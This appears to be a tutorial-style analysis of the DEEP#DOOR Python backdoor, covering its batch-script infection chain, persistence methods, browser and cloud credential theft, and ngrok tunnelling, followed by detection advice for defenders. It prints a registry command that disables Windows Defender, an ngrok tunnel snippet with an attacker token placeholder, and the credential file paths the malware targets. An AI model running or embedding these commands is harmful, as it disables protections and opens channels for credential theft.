Quick Facts
- Category: Cybersecurity
- Published: 2026-05-01 23:20:55
- How to Implement a Simulation-First Manufacturing Workflow Using OpenUSD and Physical AI
- OpenCL Steps Up: 7 Key Insights on New Cooperative Matrix Extensions for Machine Learning
- Stealthy Python Backdoor Exploits Tunneling Services to Exfiltrate Credentials
- Fintech Product Failures Linked to Feature Overload: Experts Urge Shift to 'Bedrock' Strategy
- NVIDIA and Google Cloud Unveil Next-Gen AI Infrastructure Aimed at Agentic and Physical AI
Overview
The DEEP#DOOR Python backdoor represents a sophisticated example of modern malware that leverages tunneling services to steal browser and cloud credentials while maintaining persistent access. First disclosed by cybersecurity researchers, this stealthy framework uses a multi-stage infection chain beginning with a batch script that disables Windows security controls. This tutorial will dissect the attack methodology, provide step-by-step analysis of its components, and offer guidance on detection and mitigation.

Prerequisites
Before diving into this guide, ensure you have:
- Basic understanding of Python programming and scripting
- Familiarity with Windows security features (Defender, UAC, event logs)
- Knowledge of network tunneling concepts (SSH, ngrok, FRP)
- Access to a sandboxed Windows environment for testing (optional but recommended)
Step-by-Step Analysis of DEEP#DOOR
1. Initial Infection Vector
The attack chain begins when a victim executes a seemingly benign file, which triggers install_obf.bat. This batch script is obfuscated and performs the following actions:
- Disables Windows Security Controls: The script uses
reg addcommands to tamper with registry keys that control Windows Defender and real-time monitoring. For example:
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- Extracts Embedded Payload: The script dynamically extracts a base64-encoded Python script from its own code using PowerShell or built-in commands. This payload is then saved to a temporary directory.
- Executes Python Backdoor: The extracted Python script is launched silently, often using
pythonw.exe(the windowless Python interpreter) to avoid console windows.
2. Persistence Mechanisms
Once the Python backdoor is active, it establishes persistence through multiple methods:
- Scheduled Tasks: Creates a task in Windows Task Scheduler that runs the backdoor at user logon or system boot.
- Registry Run Keys: Adds entries to
HKCU\Software\Microsoft\Windows\CurrentVersion\RunorHKLM\...\Runto execute the malicious script on startup. - Startup Folder: Copies a shortcut or script to the user's Startup folder.
3. Data Exfiltration Techniques
The primary objective of DEEP#DOOR is credential harvesting. It targets:
- Browser Credentials: Reads saved passwords from Chrome, Firefox, and Edge by accessing local SQLite databases (e.g.,
%LOCALAPPDATA%\Google\Chrome\User Data\Default\Login Data). Decryption is performed using the browser's stored encryption keys. - Cloud Tokens: Steals session tokens and API keys from AWS, Azure, and Google Cloud configuration files (e.g.,
~/.aws/credentials,%APPDATA%\Azure\AzureRM\AzureRM.json). - System Information: Collects hostname, username, IP address, and list of installed software for reconnaissance.
4. Tunneling Service Abuse
To exfiltrate data and maintain command-and-control (C2) communication, DEEP#DOOR abuses legitimate tunneling services like ngrok or FRP. The Python script establishes an outbound connection to the tunneling service, which then forwards traffic to the attacker's server. This technique:

- Bypasses firewalls: Since outbound connections to well-known tunneling services are often whitelisted.
- Encrypts traffic: Use HTTPS tunnels, making detection by network monitoring tools challenging.
- Provides persistent access: The tunnel remains active even if the victim changes networks.
Example Python code snippet for establishing a tunnel (simplified):
import subprocess
subprocess.Popen(['ngrok', 'tcp', '--authtoken', 'ATTACKER_TOKEN', '1234'])
The backdoor then listens on localhost:1234 for incoming C2 commands and exfiltrates data via HTTP POST requests to the tunnel URL.
Common Mistakes in Detection and Response
- Ignoring Obfuscated Scripts: Many defenses overlook batch scripts or PowerShell commands because they expect malicious payloads only in executables. Always inspect scripts that modify security settings.
- Relying Solely on Signature Detection: DEEP#DOOR uses polymorphism—each sample may have different variable names and base64 strings. Behavioral analysis is crucial.
- Neglecting Outbound Tunneling: Network teams often focus on inbound connections. Monitor for unexpected outbound connections to tunneling services (e.g., ngrok.io, frp.io).
- Failing to Review Scheduled Tasks: Backdoor persistence often hides as seemingly legitimate tasks. Audit all scheduled tasks for unknown scripts.
Summary
DEEP#DOOR demonstrates how modern backdoors combine easy-to-use Python scripting with legitimate tunneling services to evade detection and steal sensitive credentials. By understanding the infection chain—starting from an obfuscated batch script that disables defenses, to Python-based credential harvesting and tunnel-abuse—security teams can better prepare defenses. Key takeaways: disable script execution policies, monitor outbound connections to tunneling platforms, and regularly audit scheduled tasks and registry run keys. Proactive threat hunting and behavioral analytics are essential to catch such stealthy threats before data exfiltration occurs.